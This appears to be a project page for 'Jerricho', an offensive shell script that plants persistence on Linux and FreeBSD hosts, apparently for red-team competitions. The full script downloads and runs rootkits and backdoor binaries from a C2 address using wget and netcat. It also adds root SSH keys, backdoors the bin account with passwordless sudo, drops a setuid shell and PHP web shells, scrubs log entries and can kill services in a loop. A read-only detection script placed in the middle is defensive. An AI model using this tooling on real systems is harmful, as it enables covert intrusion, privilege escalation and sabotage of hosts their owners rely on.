Jerricho is a simple Bourne shell script that quickly drops several persistence mechanisms on a target Linux host. OS support: Ubuntu, CentOS, Debian, FreeBSD.
TODO:
– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, store, and sort them accordingly.
– Add a function to check to see if the system is still infected / running the rootkit and backdoors and if not re-execute/re-infect the system.
– Aggregate sniffer logs
– Keeping track of hosts which are still accessible via rootkit
– add bin to sudoers
– clear up logs better (Could probably do a date check when we execute on the system and remove all log lines that are 5 seconds before and 15 seconds after)
– spider and revert sshd_config
– rootkit – specify multiple ports on cmdline
– add iptables -F to all init scripts.
– Change the timestamp of modified files
Usage:
+ You run it as root, it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.
+ runs stuff out of "/dev/..." and "/dev/  " (2 spaces) because hiding in plain sight is easy.
+ to run via msf session: sessions -c export HISTFILE=/dev/null; wget -q $C2_URL/scripts/jericho2.1.sh -O /dev/stdout | /bin/sh – && history -c
This creates several ways back in:
1) drops our kernel rootkit which hooks accept() — lets us back in via any listening port, hides processes, etc
2) adds a root ssh key
3) drops our modified trixd00rd (takes params from env vars) as 'rsyslogd'
4) drops the rooty icmp backdoor as 'udevd'
5) backdoors the 'bin' system account, adds it to sudoers
6) adds a setuid shell in "/dev/ /" for re-elevation from php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)
Additional:
– removes all entries from who (removes & re-creates utmp file, we can be selective later)
– optionally installs a root crontab to clear iptables rules every 5m. (uncomment iptables stuff if needed)
– optionally runs a bash script that takes down all services every 10s (teams lose points, also currently disabled)
– adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the std %h/.ssh dirs.
– We actually had people unknowingly remove the kernel backdoor through various upgrade and reboot activities, init script changes, etc., only for us to retain access using the web shell, re-elevate via the suid bin and reinstall.
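The two lists above read, from the blue-team side, as a checklist of host artifacts. The following read-only audit script is an added example, not code from Jerricho or its authors: it walks a filesystem tree (a live host's "/" or a mounted evidence image) and reports each artifact the page describes: the dot- and space-named work directories under /dev, a setuid binary under /dev, NOPASSWD sudoers grants and sudo-group membership for bin/www-data/apache/httpd, the bin account with a login shell and a password hash, an absolute AuthorizedKeysFile in sshd_config plus /etc/ssh/authorized_keys and root's authorized_keys2, the .src.php one-liners, the iptables-flushing crontab, /usr/share/service.sh, an emptied utmp, and processes executing from /dev. The cron spool paths, the sudo/wheel group names, and the `*e` backup files are assumptions drawn from general Linux behaviour rather than from the page: the script's log scrubbing runs `sed -ie`, which GNU and BSD sed read as "in place, backup suffix e", so a scrubbed /var/log/auth.log leaves an unscrubbed /var/log/auth.loge beside it.

```shell
#!/bin/sh
# Read-only audit for the persistence artifacts listed above (added example,
# not part of Jerricho). ROOT is the tree to inspect: "/" on a live host, or
# a mounted image / staged copy for offline triage. Findings are printed as
# "TAG<TAB>detail"; nothing on the host is modified.

finding() { printf '%s\t%s\n' "$1" "$2"; }

# Work directories whose names consist only of dots or spaces ("/dev/...", "/dev/  ").
check_staging_dirs() {
    for d in "$1"/dev/* "$1"/dev/.*; do
        [ -d "$d" ] || continue
        n=${d##*/}
        case $n in .|..) continue ;; esac
        [ -z "$(printf '%s' "$n" | tr -d '. ')" ] && finding staging-dir "$d"
    done
    return 0
}

# The setuid copy of /bin/sh dropped under /dev for re-elevation.
check_setuid_in_dev() {
    find "$1/dev" -xdev -type f -perm -4000 2>/dev/null |
        while IFS= read -r f; do finding setuid-in-dev "$f"; done
}

# Passwordless sudo for bin and the web-server accounts, and membership of those
# accounts in a sudo-granting group (admin on Ubuntu; sudo/wheel assumed elsewhere).
check_sudo_grants() {
    if [ -r "$1/etc/sudoers" ]; then
        grep -nE '^(bin|www-data|apache|httpd)[[:space:]]+ALL=.*NOPASSWD' "$1/etc/sudoers" |
            while IFS= read -r l; do finding sudoers-nopasswd "$l"; done
    fi
    if [ -r "$1/etc/group" ]; then
        grep -E '^(admin|sudo|wheel):' "$1/etc/group" |
            grep -E '[:,](bin|www-data|apache|httpd)(,|$)' |
            while IFS= read -r l; do finding privileged-group "$l"; done
    fi
    return 0
}

# The bin system account given a login shell and a usable password hash.
check_bin_account() {
    if [ -r "$1/etc/passwd" ]; then
        shell=$(awk -F: '$1=="bin"{print $7}' "$1/etc/passwd")
        case $shell in
            ""|*/nologin|*/false) ;;
            *) finding system-account-shell "bin: $shell" ;;
        esac
    fi
    if [ -r "$1/etc/shadow" ]; then
        hash=$(awk -F: '$1=="bin"{print $2}' "$1/etc/shadow")
        case $hash in
            ""|"*"*|"!"*) ;;                     # no password, or locked
            *) finding system-account-password "bin has a usable password hash" ;;
        esac
    fi
    return 0
}

# Host-wide key file added to sshd_config, plus the deprecated authorized_keys2.
check_ssh_keys() {
    f=$1/etc/ssh/sshd_config
    if [ -r "$f" ]; then
        grep -nE '^[[:space:]]*AuthorizedKeysFile[[:space:]]+/' "$f" |
            while IFS= read -r l; do finding sshd-shared-keyfile "$f:$l"; done
    fi
    [ -f "$1/etc/ssh/authorized_keys" ] && finding sshd-shared-keyfile "$1/etc/ssh/authorized_keys"
    [ -f "$1/root/.ssh/authorized_keys2" ] && finding root-authorized-keys2 "$1/root/.ssh/authorized_keys2"
    return 0
}

# PHP one-liner shells, the iptables-flushing crontab, the service killer, an
# emptied utmp, and the "*e" backups that "sed -ie" leaves beside scrubbed logs.
check_files() {
    grep -rlF 'shell_exec($_GET' "$1/var/www" 2>/dev/null |
        while IFS= read -r f; do finding webshell "$f"; done
    for f in "$1/var/spool/cron/crontabs/root" "$1/var/spool/cron/root" "$1"/etc/cron.d/*; do
        [ -f "$f" ] && grep -q 'iptables -F' "$f" && finding cron-iptables-flush "$f"
    done
    [ -f "$1/usr/share/service.sh" ] && finding service-killer "$1/usr/share/service.sh"
    [ -f "$1/var/run/utmp" ] && [ ! -s "$1/var/run/utmp" ] && finding utmp-emptied "$1/var/run/utmp"
    for f in "$1/var/log/auth.loge" "$1/var/log/messagese" "$1/var/log/securee"; do
        [ -f "$f" ] && finding sed-backup-of-scrubbed-log "$f"
    done
    return 0
}

# Live host only: processes whose binary lives under /dev (the rsyslogd/udevd
# impostors). An offline tree has no /proc, so this simply finds nothing there.
check_live_processes() {
    for exe in "$1"/proc/[0-9]*/exe; do
        t=$(readlink "$exe" 2>/dev/null) || continue
        case $t in /dev/*) finding process-from-dev "${exe%/exe}: $t" ;; esac
    done
    return 0
}

audit_host() {
    r=${1%/}                                     # "/" becomes "" so "$r/etc" is "/etc"
    check_staging_dirs "$r"; check_setuid_in_dev "$r"; check_sudo_grants "$r"
    check_bin_account "$r"; check_ssh_keys "$r"; check_files "$r"; check_live_processes "$r"
}

count_findings() { audit_host "$1" | wc -l | tr -d ' '; }

# Usage: sh jerricho_audit.sh /        (no argument: only define the functions)
if [ -n "${1:-}" ]; then audit_host "$1"; fi
```

Run it as `sh jerricho_audit.sh /` on a suspect host, or point it at the mount point of an evidence image. The sed backups are worth more than a hit: `diff /var/log/auth.loge /var/log/auth.log` recovers exactly the lines the scrubbing removed, including the groupadd/usermod entries and the logins from the C2 address.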
Latest Released v-2.1 Code:
#!/bin/sh
# cmc / sapling
# installs rootkit & backdoors on debian/centos/pfsense bsd boxes

# root ssh key
SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"

### CHANGE ME ###
# urls for webserver where kits/backdoor binaries are hosted
# file names to grab
C2_URL="http://172.25.58.142/"
C2_IP="172.25.58.142"
# fedora kit
FEDORA_KIT="fedx32.bin"
FEDORA64_KIT="fedx64.bin"
UBUNTU64_KIT="ubux64.bin"
UBUNTU_KIT="ubux32.bin"
BSD_KIT="hole.bin"
TRIXDOOR="trixd00rd-static-ubuntu"
ROOTY="rooty-release.x86"
ROOTYBSD="rootybsd.x64"
#################

ARCH=`uname -i`

do_backdoors() {
    echo "removing utmp.."
    rm -rf /var/run/utmp
    touch /var/run/utmp
    chmod 664 /var/run/utmp

    echo "installing root ssh key!"
    chattr -i /root/.ssh/authorized*
    if [ ! -d "/root/.ssh" ]; then
        mkdir /root/.ssh
    fi
    echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
    echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
    # add secondary key auth file, for when they inevitably remove /root/.ssh/
    echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
    echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
    chattr +i /root/.ssh/authorized_keys*

    echo "dropping trixd00r.."
    if [ ! -d "/dev/..." ]; then
        mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$TRIXDOOR -O rsyslogd
    chmod +x rsyslogd
    env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &

    echo "dropping rooty.."
    wget -q $C2_URL$ROOTY -O udevd
    chmod +x udevd
    env PATH=$PWD /usr/bin/nohup udevd &

    # uncomment below to do iptables crontab shenanigans
    # echo "adding 5m disable iptables crontab.."
    # echo "*/5 * * * * /sbin/iptables -F" | crontab -

    echo "backdoor bin account! pass=lol123"
    sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
    usermod -s /bin/sh bin
    echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
    echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
    echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
    echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
    groupadd admin
    # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
    sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
    # ubuntu automatically makes members of admin have sudo capabilities.
    # lets give that as an option for root to web backdoors
    usermod -G admin -a bin
    usermod -G admin -a www-data
    usermod -G admin -a httpd
    usermod -G admin -a apache
    # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
    sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure

    echo "setuid /bin/sh! for use with bin account"
    if [ ! -d "/dev/ " ]; then
        mkdir "/dev/ "
    fi
    cp /bin/sh "/dev/ /pwnd"
    chmod 777 "/dev/ /pwnd"
    chown root:root "/dev/ /pwnd"
    chmod u+s "/dev/ /pwnd"

    echo "clearing log entries with our IP.."
    sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
    sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
    sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
    sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure

    echo "dropping webshells.."
    echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
    chmod 777 /var/www/.src.php
    echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
    chmod 777 /var/www/html/.src.php
}

do_bsdbackdoors() {
    # this was a quick hack for the pfsense firewalls
    # uses netcat vs wget because wget isnt installed on pfsense
    # by default
    echo "installing root ssh key!"
    if [ ! -d "/root/.ssh" ]; then
        mkdir /root/.ssh
    fi
    echo $PUBKEY >> /root/.ssh/authorized_keys2
    echo $PUBKEY >> /root/.ssh/authorized_keys
    chattr +i /root/.ssh/authorized_keys*

    echo "dropping rooty via netcat.."
    # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
    if [ ! -d "/dev/ " ]; then
        mkdir "/dev/ "
    fi
    cd "/dev/ "
    nc $C2_IP 1338 > udevd
    chmod +x udevd
    env PATH=$PWD /usr/bin/nohup udevd &

    echo "dropping webshells.."
    echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
    chmod 777 /var/www/.src.php
    echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
    chmod 777 /var/www/html/.src.php
}

do_centos_rootkit() {
    echo "Retrieving Fedora x86 kit..."
    if [ ! -d "/dev/..." ]; then
        mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$FEDORA_KIT
    chmod +x `basename $FEDORA_KIT`
    ./`basename $FEDORA_KIT`
}

do_centos64_rootkit() {
    echo "Retrieving Fedora x64 kit..."
    if [ ! -d "/dev/..." ]; then
        mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$FEDORA64_KIT
    chmod +x `basename $FEDORA64_KIT`
    ./`basename $FEDORA64_KIT`
}

do_freebsd64_rootkit() {
    echo "Installing BSD hole.bin.."
    cd /opt/
    # cmc: pfSense / BSD has no wget/curl
    # make sure we have a listening netcat
    # cat backdoor.bin | nc -v -l 13337
    nc $C2_URL 1337 > /opt/scorebotd
    # chmod 0755 `basename $BSD_KIT`
    # mv `basename $BSD_KIT` /opt/scorebotd
    chmod +x /opt/scorebotd
    nohup /opt/scorebotd &
}

do_ubuntu_rootkit() {
    echo "Retrieving ubuntu x86 kit..."
    if [ ! -d "/dev/..." ]; then
        mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$UBUNTU_KIT
    chmod +x `basename $UBUNTU_KIT`
    ./`basename $UBUNTU_KIT`
}

do_ubuntu64_rootkit() {
    echo "Retrieving ubuntu x64 kit..."
    if [ ! -d "/dev/..." ]; then
        mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$UBUNTU64_KIT
    chmod +x `basename $UBUNTU64_KIT`
    ./`basename $UBUNTU64_KIT`
}

goodbye_sla() {
    cat <<EOF > /usr/share/service.sh
#!/bin/bash
#UMAD?
while [ 0 ]
do
service httpd stop
service postfix stop
service sendmail stop
service mysql stop
service webmin stop
service named stop
service bind stop
killall -9 webmin.pl
killall -9 apache2
killall -9 httpd
killall -9 named
killall -9 mysqld_safe
killall -9 mysqld
sleep 10
done
EOF
    chmod +x /usr/share/service.sh
    nohup /usr/share/service.sh >/dev/null 2>&1 &
}

# 64bit fedora
if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
    do_centos64_rootkit
    do_backdoors
fi

# 32bit fedora
if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
    do_centos_rootkit
    do_backdoors
    #goodbye_sla
fi

# ubuntu/debian 64bit
if [ $ARCH = "x86_64" ] && [ -f "/etc/debian_version" ]; then
    do_ubuntu64_rootkit
    do_backdoors
    #goodbye_sla
fi

# ubuntu/debian 32bit (assumed if not 64, whatever)
if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
    do_ubuntu32_rootkit
    do_backdoors
    #goodbye_sla
fi

# freebsd
if [ `uname` = 'FreeBSD' ]; then
    do_freebsd64_kit
    do_bsdbackdoors
fi
Source: https://github.com/ketm768